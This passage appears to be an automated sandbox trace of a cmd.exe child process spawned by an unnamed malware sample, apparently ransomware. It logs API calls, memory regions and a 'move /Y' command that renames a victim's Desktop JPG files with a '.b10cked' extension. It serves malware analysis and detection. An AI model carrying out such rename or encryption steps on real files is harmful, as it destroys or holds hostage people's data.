lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", lpFilePart=0x0) returned 0x38 [0142.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", nBufferLength=0x104, lpBuffer=0x30ef9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", lpFilePart=0x0) returned 0x30 [0142.324] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg")) returned 0x20 [0142.324] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg.b10cked"), dwFlags=0x3) returned 1 [0142.606] FindClose (in: hFindFile=0x100e58 | out: hFindFile=0x100e58) returned 1 [0142.607] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ef50 | out: _Buffer=" 1") returned 9 [0142.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.607] GetFileType (hFile=0x7) returned 0x2 [0142.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eedc | out: lpMode=0x30eedc) returned 1 [0142.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ef10 | out: lpConsoleScreenBufferInfo=0x30ef10) returned 1 [0142.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.608] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ef50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.608] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ef34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ef34*=0x1a) returned 1 [0142.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.608] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.608] SetConsoleInputExeNameW () returned 0x1 [0142.608] GetConsoleOutputCP () returned 0x1b5 [0142.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.608] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.609] exit (_Code=0) Process: id = "176" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15038 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15039 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15040 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15041 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15042 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15043 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15044 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15045 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15046 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 15047 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15690 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15691 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15692 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15693 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 15694 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 15695 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15696 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15699 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15700 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15701 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15702 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15703 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15704 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 15705 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15706 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15707 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15708 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 15709 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15710 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15711 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 15712 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 15713 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 233 os_tid = 0xe9c [0140.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc9c | out: lpSystemTimeAsFileTime=0x1efc9c*(dwLowDateTime=0x8da5b160, dwHighDateTime=0x1d440a9)) [0140.455] GetCurrentProcessId () returned 0xea0 [0140.456] GetCurrentThreadId () returned 0xe9c [0140.456] GetTickCount () returned 0x2c189 [0140.456] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc94 | out: lpPerformanceCount=0x1efc94*=19724479968) returned 1 [0140.456] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.456] __set_app_type (_Type=0x1) [0140.456] __p__fmode () returned 0x76b331f4 [0140.457] __p__commode () returned 0x76b331fc [0140.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.457] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.457] GetCurrentThreadId () returned 0xe9c [0140.457] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0140.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.457] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.457] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.457] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.457] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc2c | out: phkResult=0x1efc2c*=0x0) returned 0x2 [0140.457] VirtualQuery (in: lpAddress=0x1efc63, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] GetConsoleOutputCP () returned 0x1b5 [0140.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.458] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.459] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.459] GetEnvironmentStringsW () returned 0x250210* [0140.459] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.459] GetEnvironmentStringsW () returned 0x250210* [0140.460] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb9c | out: phkResult=0x1eeb9c*=0x40) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0xa0, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x0, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegCloseKey (hKey=0x40) returned 0x0 [0140.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb9c | out: phkResult=0x1eeb9c*=0x40) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x0, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegCloseKey (hKey=0x40) returned 0x0 [0140.461] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.461] srand (_Seed=0x5b88636f) [0140.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" [0140.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" [0140.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.461] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.461] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.462] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.462] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.462] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.462] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.462] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.462] GetEnvironmentStringsW () returned 0x252360* [0140.462] FreeEnvironmentStringsW (penv=0x252360) returned 1 [0140.462] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.462] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.462] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.462] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.462] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.462] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.462] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.462] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.462] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.462] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef968, lpFilePart=0x1ef964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef964*="Desktop") returned 0x18 [0140.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.463] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.463] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.463] GetEnvironmentStringsW () returned 0x250210* [0140.464] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.464] GetConsoleOutputCP () returned 0x1b5 [0140.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.464] GetUserDefaultLCID () returned 0x409 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="0") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="0") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="1") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.465] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.467] GetConsoleTitleW (in: lpConsoleTitle=0x240930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.468] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.468] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.468] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.468] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.468] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.468] _wcsicmp (_String1="REM", _String2="move") returned 5 